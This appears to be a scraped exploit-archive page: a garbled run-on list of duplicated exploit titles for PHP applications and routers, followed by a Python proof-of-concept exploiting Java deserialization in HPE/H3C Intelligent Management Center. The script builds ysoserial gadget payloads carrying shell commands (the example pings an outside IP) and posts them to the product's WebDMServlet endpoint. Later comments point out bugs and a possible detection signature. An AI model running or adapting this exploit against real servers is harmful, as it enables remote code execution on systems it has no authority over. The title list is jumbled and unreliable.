Remote File Inclusion NewP News Publishing System 1.0 - 'Class.Database.php' Remote File Inclusion Advanced Guestbook 2.3.1 - admin.php Remote File Inclusion Advanced Guestbook 2.3.1 - 'admin.php' Remote File Inclusion @cid Stats 2.3 - Install.php3 Remote File Inclusion @cid Stats 2.3 - 'Install.php3' Remote File Inclusion PHPMyChat 0.14/0.15 - Languages.Lib.php Local File Inclusion PHPMyChat 0.14/0.15 - 'Languages.Lib.php' Local File Inclusion PHPdebug 1.1 - Debug_test.php Remote File Inclusion PHPdebug 1.1 - 'Debug_test.php' Remote File Inclusion eXtreme-fusion 4.02 - Fusion_Forum_View.php Local File Inclusion eXtreme-fusion 4.02 - 'Fusion_Forum_View.php' Local File Inclusion Easy Banner Pro 2.8 - info.php Remote File Inclusion Edit-X - Edit_Address.php Remote File Inclusion Easy Banner Pro 2.8 - 'info.php' Remote File Inclusion Edit-X - 'Edit_Address.php' Remote File Inclusion OpenEMR 2.8.2 - Import_XML.php Remote File Inclusion OpenEMR 2.8.2 - 'Import_XML.php' Remote File Inclusion PHPProbid 5.24 - Lang.php Remote File Inclusion PHPProbid 5.24 - 'Lang.php' Remote File Inclusion MySQLNewsEngine - Affichearticles.php3 Remote File Inclusion MySQLNewsEngine - 'Affichearticles.php3' Remote File Inclusion Meganoide's News 1.1.1 - Include.php Remote File Inclusion Meganoide's News 1.1.1 - 'Include.php' Remote File Inclusion Shop Kit Plus - StyleCSS.php Local File Inclusion Shop Kit Plus - 'StyleCSS.php' Local File Inclusion Pickle 0.3 - download.php Local File Inclusion Active Calendar 1.2 - showcode.php Local File Inclusion Pickle 0.3 - 'download.php' Local File Inclusion Active Calendar 1.2 - 'showcode.php' Local File Inclusion JCCorp URLShrink Free 1.3.1 - CreateURL.php Remote File Inclusion JCCorp URLShrink Free 1.3.1 - 'CreateURL.php' Remote File Inclusion Weekly Drawing Contest 0.0.1 - Check_Vote.php Local File Inclusion Weekly Drawing Contest 0.0.1 - 'Check_Vote.php' Local File Inclusion WordPress < 2.1.2 - PHP_Self Cross-Site Scripting WordPress < 2.1.2 - 
'PHP_Self' Cross-Site Scripting Satel Lite - Satellite.php Local File Inclusion Satel Lite - 'Satellite.php' Local File Inclusion eCardMAX HotEditor 4.0 - Keyboard.php Local File Inclusion eCardMAX HotEditor 4.0 - 'Keyboard.php' Local File Inclusion MyNews 4.2.2 - Week_Events.php Remote File Inclusion MyNews 4.2.2 - 'Week_Events.php' Remote File Inclusion Web Service Deluxe News Manager 1.0.1 Deluxe - footer.php Local File Inclusion Actionpoll 1.1 - Actionpoll.php Remote File Inclusion Web Service Deluxe News Manager 1.0.1 Deluxe - 'footer.php' Local File Inclusion Actionpoll 1.1 - 'Actionpoll.php' Remote File Inclusion Fully Modded PHPBB2 - phpbb_root_path Remote File Inclusion Fully Modded PHPBB2 - 'phpbb_root_path' Remote File Inclusion PHP Turbulence 0.0.1 - Turbulence.php Remote File Inclusion PHP Turbulence 0.0.1 - 'Turbulence.php' Remote File Inclusion Allfaclassifieds 6.04 - Level2.php Remote File Inclusion PHPMyBibli 1.32 - Init.Inc.php Remote File Inclusion Allfaclassifieds 6.04 - 'Level2.php' Remote File Inclusion PHPMyBibli 1.32 - 'Init.Inc.php' Remote File Inclusion ACVSWS - Transport.php Remote File Inclusion ACVSWS - 'Transport.php' Remote File Inclusion Lms 1.5.x - RTMessageAdd.php Remote File Inclusion Lms 1.5.x - 'RTMessageAdd.php' Remote File Inclusion MyNewsGroups 0.6 - Include.php Remote File Inclusion PHPMyTGP 1.4 - AddVIP.php Remote File Inclusion MyNewsGroups 0.6 - 'Include.php' Remote File Inclusion PHPMyTGP 1.4 - 'AddVIP.php' Remote File Inclusion Comus 2.0 - Accept.php Remote File Inclusion Comus 2.0 - 'Accept.php' Remote File Inclusion HTMLEditBox 2.2 - config.php Remote File Inclusion DynaTracker 1.5.1 - includes_handler.php base_path Remote File Inclusion DynaTracker 1.5.1 - action.php base_path Remote File Inclusion HTMLEditBox 2.2 - 'config.php' Remote File Inclusion DynaTracker 1.5.1 - 'includes_handler.php' 'base_path' Remote File Inclusion DynaTracker 1.5.1 - 'action.php' 'base_path' Remote File Inclusion Doruk100Net - Info.php 
Remote File Inclusion Doruk100Net - 'Info.php' Remote File Inclusion PHPSecurityAdmin 4.0.2 - Logout.php Remote File Inclusion PHPSecurityAdmin 4.0.2 - 'Logout.php' Remote File Inclusion PHP Content Architect 0.9 pre 1.2 - MFA_Theme.php Remote File Inclusion PHP Content Architect 0.9 pre 1.2 - 'MFA_Theme.php' Remote File Inclusion PHPHostBot 1.05 - Authorize.php Remote File Inclusion PHPHostBot 1.05 - 'Authorize.php' Remote File Inclusion PHMe 0.0.2 - Function_List.php Local File Inclusion PHMe 0.0.2 - 'Function_List.php' Local File Inclusion VietPHP - _functions.php dirpath Parameter Remote File Inclusion VietPHP - admin/index.php language Parameter Remote File Inclusion VietPHP - '_functions.php' dirpath Parameter Remote File Inclusion VietPHP - 'admin/index.php' language Parameter Remote File Inclusion Coppermine Photo Gallery 1.3/1.4 - YABBSE.INC.php Remote File Inclusion Coppermine Photo Gallery 1.3/1.4 - 'YABBSE.INC.php' Remote File Inclusion Shoutbox 1.0 - Shoutbox.php Remote File Inclusion Shoutbox 1.0 - 'Shoutbox.php' Remote File Inclusion Web News 1.1 - feed.php config[root_ordner] Parameter Remote File Inclusion Web News 1.1 - news.php config[root_ordner] Parameter Remote File Inclusion Lib2 PHP Library 0.2 - My_Statistics.php Remote File Inclusion Web News 1.1 - 'feed.php' 'config[root_ordner]' Parameter Remote File Inclusion Web News 1.1 - 'news.php' 'config[root_ordner]' Parameter Remote File Inclusion Lib2 PHP Library 0.2 - 'My_Statistics.php' Remote File Inclusion Dalai Forum 1.1 - forumreply.php Local File Inclusion Firesoft - Class_TPL.php Remote File Inclusion Dalai Forum 1.1 - 'forumreply.php' Local File Inclusion Firesoft - 'Class_TPL.php' Remote File Inclusion PHP-Nuke 8.0 - autohtml.php Local File Inclusion PHP-Nuke 8.0 - 'autohtml.php' Local File Inclusion Content Builder 0.7.5 - postComment.php Remote File Inclusion Content Builder 0.7.5 - 'postComment.php' Remote File Inclusion Jeebles Technology Jeebles Directory 2.9.60 - download.php 
Local File Inclusion Jeebles Technology Jeebles Directory 2.9.60 - 'download.php' Local File Inclusion PHPbasic basicFramework 1.0 - Includes.php Remote File Inclusion PHPbasic basicFramework 1.0 - 'Includes.php' Remote File Inclusion Galmeta Post 0.2 - Upload_Config.php Remote File Inclusion Galmeta Post 0.2 - 'Upload_Config.php' Remote File Inclusion MyBlog 1.x - Games.php ID Remote File Inclusion MyBlog 1.x - 'Games.php' 'ID' Remote File Inclusion PHPMyTourney 2 - tourney/index.php Remote File Inclusion PHPMyTourney 2 - 'tourney/index.php' Remote File Inclusion W-Agora 4.0 - add_user.php bn_dir_default Parameter Remote File Inclusion W-Agora 4.0 - create_forum.php bn_dir_default Parameter Remote File Inclusion W-Agora 4.0 - create_user.php bn_dir_default Parameter Remote File Inclusion W-Agora 4.0 - delete_notes.php bn_dir_default Parameter Remote File Inclusion W-Agora 4.0 - delete_user.php bn_dir_default Parameter Remote File Inclusion W-Agora 4.0 - edit_forum.php bn_dir_default Parameter Remote File Inclusion W-Agora 4.0 - mail_users.php bn_dir_default Parameter Remote File Inclusion W-Agora 4.0 - moderate_notes.php bn_dir_default Parameter Remote File Inclusion W-Agora 4.0 - reorder_forums.php bn_dir_default Parameter Remote File Inclusion W-Agora 4.0 - 'add_user.php' bn_dir_default Parameter Remote File Inclusion W-Agora 4.0 - 'create_forum.php' bn_dir_default Parameter Remote File Inclusion W-Agora 4.0 - 'create_user.php' bn_dir_default Parameter Remote File Inclusion W-Agora 4.0 - 'delete_notes.php' bn_dir_default Parameter Remote File Inclusion W-Agora 4.0 - 'delete_user.php' bn_dir_default Parameter Remote File Inclusion W-Agora 4.0 - 'edit_forum.php' bn_dir_default Parameter Remote File Inclusion W-Agora 4.0 - 'mail_users.php' bn_dir_default Parameter Remote File Inclusion W-Agora 4.0 - 'moderate_notes.php' bn_dir_default Parameter Remote File Inclusion W-Agora 4.0 - 'reorder_forums.php' bn_dir_default Parameter Remote File Inclusion XOOPS 2.0.18 - 
modules/system/admin.php fct Parameter Traversal Local File Inclusion XOOPS 2.0.18 - 'modules/system/admin.php' 'fct' Parameter Traversal Local File Inclusion Allied Telesis AT-RG634A ADSL Broadband Router - Unauthenticated Webshell Allied Telesis AT-RG634A ADSL Broadband Router - Unauthenticated Web Shell C99Shell 1.0 Pre-Release build 16 - 'ch99.php' Cross-Site Scripting C99Shell 1.0 Pre-Release build 16 (Web Shell) - 'ch99.php' Cross-Site Scripting C99 Shell - 'c99.php' Authentication Bypass C99Shell (Web Shell) - 'c99.php' Authentication Bypass W-Agora 4.2.1 - search.php3 bn Parameter Traversal Local File Inclusion W-Agora 4.2.1 - 'search.php3' 'bn' Parameter Traversal Local File Inclusion Andy's PHP KnowledgeBase 0.95.4 - 'step5.php' Remote PHP Code Execution Andy's PHP KnowledgeBase 0.95.4 - 'step5.php' PHP Remote Code Execution MySQLDumper 1.24.4 - 'menu.php' Remote PHP Code Execution MySQLDumper 1.24.4 - 'menu.php' PHP Remote Code Execution Microweber 1.0.3 - Arbitrary File Upload / Filter Bypass / Remote PHP Code Execution Microweber 1.0.3 - Arbitrary File Upload / Filter Bypass / PHP Remote Code Execution Zend Framework 2.4.2 - XML eXternal Entity Injection (XXE) on PHP FPM Zend Framework 2.4.2 - PHP FPM XML eXternal Entity Injection Nuts CMS - Remote PHP Code Injection / Execution Nuts CMS - PHP Remote Code Injection / Execution WordPress Plugin WP Super Cache - Remote PHP Code Execution WordPress Plugin WP Super Cache - PHP Remote Code Execution b374k Web Shell 3.2.3/2.8 - Cross-Site Request Forgery / Command Injection b374k 3.2.3/2.8 (Web Shell) - Cross-Site Request Forgery / Command Injection Ovidentia online Module 2.8 - GLOBALS[babAddonPhpPath] Remote File Inclusion Ovidentia online Module 2.8 - 'GLOBALS[babAddonPhpPath]' Remote File Inclusion XOOPS Glossaire Module- '/modules/glossaire/glossaire-aff.php' SQL Injection XOOPS Glossaire Module - '/modules/glossaire/glossaire-aff.php' SQL Injection ZKTeco ZKBioSecurity 3.0 - Hard-Coded Credentials 
Remote SYSTEM Code Execution ZKTeco ZKBioSecurity 3.0 - Hard-Coded Credentials SYSTEM Remote Code Execution Apache - HTTP OPTIONS Memory Leak Apache < 2.2.34 / < 2.4.27 - HTTP OPTIONS Memory Leak Foodspotting Clone 1.0 - SQL Injection iTech Gigs Script 1.20 - 'cat' Parameter SQL Injection Tecnovision DLX Spot - Authentication Bypass Tecnovision DLX Spot - Arbitrary File Upload
#!/usr/bin/env python

########################################################################################################
#
# HPE/H3C IMC - Java Deserialization Exploit
#
# Version 0.1
# Tested on Windows Server 2008 R2
# Name HPE/H3C IMC (Intelligent Management Center) Java 1.8.0_91
#
# Author:
# Raphael Kuhn (Daimler TSS)
#
# Special thanks to:
# Jan Esslinger (@H_ng_an) for the websphere exploit this one is based upon
#
#######################################################################################################

import requests
import sys
import os
import os.path
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Module-level defaults. host is reassigned from sys.argv[1] in the __main__
# block and payload_file from sys.argv[3] in the -payload-binary branch; body
# is not referenced anywhere else in the listing shown.
host = "127.0.0.1:8080"
payload_file = "payload.bin"
body = ""

# exploit() posts with verify=False, i.e. TLS certificate validation is turned
# off; this call silences the InsecureRequestWarning that urllib3 would
# otherwise emit for every such request.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def printUsage():
    """Print the command-line help banner to stdout.

    Every line is a fixed string; the lines that show an invocation have the
    script name (sys.argv[0]) substituted in.
    """
    script = sys.argv[0]
    usage_lines = (
        "......................................................................................................................",
        ".",
        ". HPE/H3C - IMC Java Deserialization Exploit",
        ".",
        ". Example 1: -payload-binary",
        ". [-] Usage: %s http[s]://<IP>:<PORT> -payload-binary payload" % script,
        ". [-] Example: %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin" % script,
        ". 1. Create payload with ysoserial.jar (https://github.com/frohoff/ysoserial/releases) ",
        ". java -jar ysoserial.jar CommonsCollections3 'cmd.exe /c ping -n 1 53.48.79.183' > ysoserial_payload.bin",
        ". 2. Send request to server",
        ". %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin" % script,
        ".",
        ". Example 2: -payload-string",
        '. [-] Usage: %s http[s]://<IP>:<PORT> -payload-string "payload"' % script,
        '. [-] Example: %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"' % script,
        ". 1. Send request to server with payload as string (need ysoserial.jar in the same folder)",
        '. %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"' % script,
        ".",
        "......................................................................................................................",
    )
    # One print per entry keeps the output identical to a run of print statements.
    for text in usage_lines:
        print(text)
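def loadPayloadFile(_fileName):
    """Read a previously generated payload file and return its raw bytes.

    Args:
        _fileName: Path of the file to read; it is opened in binary mode.

    Returns:
        The complete contents of the file.

    Raises:
        IOError: If the file cannot be opened or read; not handled here.
    """
    print("[+] Load payload file %s" % _fileName)
    # The handle is closed deterministically when the block exits, instead of
    # being left for garbage collection to clean up.
    with open(_fileName, 'rb') as payloadFile:
        return payloadFile.read()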
def exploit(_payload):
    """POST the given payload to the IMC WebDMServlet endpoint.

    The base URL is taken from sys.argv[1] rather than from a parameter, and
    "/imc/topo/WebDMServlet" is appended to it. TLS certificate validation is
    disabled (verify=False) and no timeout is set on the request.

    Defender note: presumably the body is a raw Java serialization stream
    (such streams begin with the bytes AC ED 00 05), so a POST to this path
    carrying that header is a candidate detection signature -- confirm
    against your own traffic before relying on it.

    Args:
        _payload: Request body; it is sent unmodified.

    Returns:
        The response object returned by requests.post.
    """
    target = sys.argv[1] + "/imc/topo/WebDMServlet"
    print("[+] Sending exploit to %s" % (target))
    return requests.post(target, data=_payload, verify=False)
#def showResponse(_response):
# r = response
# m = r.search(_response)
# if (m.find("java.lang.NullPointerException")):
# print "[+] Found java.lang.NullPointerException, exploit finished successfully (hopefully)"
# else:
# print "[-] ClassCastException not found, exploit failed"
if __name__ == "__main__":
    # Expected command line: <base-url> <mode> <argument>. Anything shorter
    # prints the help text and exits with status 0.
    if len(sys.argv) < 4:
        printUsage()
        sys.exit(0)

    print("------------------------------------------")
    print("- HPE/H3C - IMC Java Deserialization Exploit -")
    print("------------------------------------------")
    host = sys.argv[1]
    print("[*] Connecting to %s" % host)

    mode = sys.argv[2]
    if mode == "-payload-binary":
        # The third argument names an existing payload file.
        payload_file = sys.argv[3]
        if not os.path.isfile(payload_file):
            print("[-] Can't load payload file")
        else:
            payload = loadPayloadFile(payload_file)
            response = exploit(payload)
            # NOTE(review): showResponse appears in the listing shown only as
            # commented-out code, so this call raises NameError.
            showResponse(response.content)
    elif mode == "-payload-string":
        if not os.path.isfile("ysoserial.jar"):
            print("[-] Can't load ysoserial.jar")
        else:
            # NOTE(review): the argument is pasted between single quotes into
            # a command line that os.system hands to the local shell, so a
            # quote character in it changes what that shell runs. The exit
            # status of the command is not checked.
            build_cmd = "java -jar ysoserial.jar CommonsCollections5 '" + sys.argv[3] + "' > payload.bin"
            print("[+] Create payload file (%s) " % build_cmd)
            os.system(build_cmd)
            # payload_file still holds its module-level default here.
            payload = loadPayloadFile(payload_file)
            response = exploit(payload)
            print("[+] Response received, exploit finished.")
    else:
        printUsage()